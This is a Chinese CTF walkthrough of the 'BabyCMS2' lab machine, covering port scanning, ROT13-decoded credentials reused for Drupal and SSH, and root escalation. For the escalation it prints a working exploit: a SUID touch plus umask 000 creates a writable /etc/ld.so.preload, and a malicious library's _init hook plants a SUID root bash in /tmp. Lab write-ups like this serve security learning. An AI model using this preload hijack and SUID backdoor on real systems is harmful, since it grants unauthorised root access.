当前位置: 首页 > news >正文

群友靶机BabyCMS2 - 场

BabyCMS2

nmap -p- 192.168.5.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-27 05:50 EST
Nmap scan report for 192.168.5.43 (192.168.5.43)
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5D:0A:A3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

先看80端口,发现<!-- babycms2.dsz -->大概率是域名。先对目录扫描一波

发现backup.txt,解一下basenqzva:36dTUqIRDAqX38ZnFFYx看着很怪不太像账密,随波逐流一下ROT13得到admin:36qGHdVEQNdK38MaSSLk,应该是账密了。然后没有东西了。

然后添加host,看一下域名。wappalyzer看到是drupal 11。http://babycms2.dsz/drupal/user/login

拿刚才的那组账密成功登录。搜了搜drupal 11的漏洞,好像没什么。在people中发现另一个用户henry。尝试用henry:36qGHdVEQNdK38MaSSLkssh登录一波。

henry@BabyCMS2:~$ cat user.txt
flag{user-c2088f0b8df91f708406ad4acf3d3b92}

拿到user。开始提权。

henry@BabyCMS2:~$ sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for henry: 
Sorry, user henry may not run sudo on BabyCMS2.

没有东西,看一下suid文件,find / -perm -4000 2>/dev/null注意到touch命令。看了看touch的参数,看了看定时任务,看了看本地的3306端口,跑了以下pypy64,都没找到什么有用的东西。

然后搜到了touch 命令 suid 也能提权?教你一招基于库文件劫持的提权攻击!_动态库劫持提权-CSDN博客sublarge佬写的思路,直接照着文章打的,成功提权拿到root权限。通过touch配合umask命令创建/etc/ld.so.preload来劫持了SUID 程序的启动流程

henry@BabyCMS2:~$ cd /tmp
henry@BabyCMS2:/tmp$ cat <<EOF > pe.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <sys/types.h>
> 
> // _init 函数会在库加载时自动执行
> void _init() {
>     // 【关键】如果是普通用户加载这个库,直接退出,防止死循环
>     if (geteuid() != 0) return;
> 
>     // 下面只有 Root 进程才会执行
>     // 1. 删除 preload 文件,立刻止血,防止后续干扰
>     unlink("/etc/ld.so.preload");
> 
>     // 2. 提升权限
>     setuid(0);
>     setgid(0);
>     
>     // 3. 创建 SUID 后门 Shell
>     system("cp /bin/bash /tmp/rootsh; chmod +s /tmp/rootsh");
> }
> EOF
henry@BabyCMS2:/tmp$ gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
henry@BabyCMS2:/tmp$ umask 000
henry@BabyCMS2:/tmp$ /usr/bin/touch /etc/ld.so.preload
henry@BabyCMS2:/tmp$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root root 0 Dec 26 20:27 /etc/ld.so.preload
henry@BabyCMS2:/tmp$ echo "/tmp/pe.so" > /etc/ld.so.preload
henry@BabyCMS2:/tmp$ sudo --help #运行suid程序来加载恶意库
henry@BabyCMS2:/tmp$ ls -l /tmp/rootsh
-rwsr-sr-x 1 root root 1168776 Dec 26 20:28 /tmp/rootsh
henry@BabyCMS2:/tmp$ /tmp/rootsh -p
rootsh-5.0# id
uid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)
rootsh-5.0# cat /root/root.txt
flag{root-19c1d0bdafbf97b0f104818f5911dc64}
http://www.jsqmd.com/news/161091/

相关文章:

  • OverlayFS性能影响评估:PyTorch-CUDA-v2.7文件读写测试
  • 量子威胁15年内或现,比特币不改变区块大小的情况下迁移后量子地址需20年
  • NeurIPS投稿配套代码规范:PyTorch-CUDA-v2.7环境打包
  • PyTorch-CUDA-v2.7镜像用于竞赛刷榜:Kaggle选手的秘密武器
  • 无需繁琐配置!PyTorch-CUDA-v2.7镜像助你秒启AI训练
  • 大模型Token消耗监控工具推荐:精准控制预算
  • 解决installing this may take a few minutes...问题:PyTorch-CUDA-v2.7镜像提速秘诀
  • PyTorch-CUDA-v2.7镜像用户案例研究:某独角兽公司降本增效实践
  • 自然语言处理开发提速50%:PyTorch-CUDA-v2.7镜像实测报告
  • PyTorch-CUDA-v2.7镜像CI/CD流水线揭秘:自动化构建过程
  • Intel Arc显卡适配进展:PyTorch未来能否统一生态?
  • Google Colab替代方案:自建PyTorch-CUDA-v2.7云端实验室
  • GPU利用率实时查看:nvidia-smi结合PyTorch-CUDA-v2.7使用
  • 学习率调度器选择:PyTorch-CUDA-v2.7中不同LR策略对比
  • 专业技术支持服务购买:PyTorch-CUDA-v2.7故障应急响应
  • ModelScope模型接入:PyTorch-CUDA-v2.7多平台兼容实践
  • T5文本到文本迁移:PyTorch-CUDA-v2.7框架实现
  • GPU算力代金券发放活动:新用户注册即送100小时使用时长
  • C++继承与派生关键知识总结(学生学习笔记)
  • 大模型Token计费单位解析:input vs output差异说明
  • 一汽大众汽车前束检测培训系统
  • SpringBoot从0-1集成腾讯音视频通话
  • BLIP图像描述生成:PyTorch-CUDA-v2.7应用场景拓展
  • BART摘要生成实战:PyTorch-CUDA-v2.7端到端流程
  • Swin Transformer部署:PyTorch-CUDA-v2.7移动端优化
  • Triton推理服务器集成:PyTorch-CUDA-v2.7生产环境实践
  • 树莓派4B安装PyTorch有多难?不如选用专用边缘计算镜像
  • Zero Redundancy Optimizer应用:降低PyTorch-CUDA-v2.7内存占用
  • 如何清理PyTorch-CUDA-v2.7镜像缓存节省空间?
  • IP 地址与 MAC 地址基础知识总结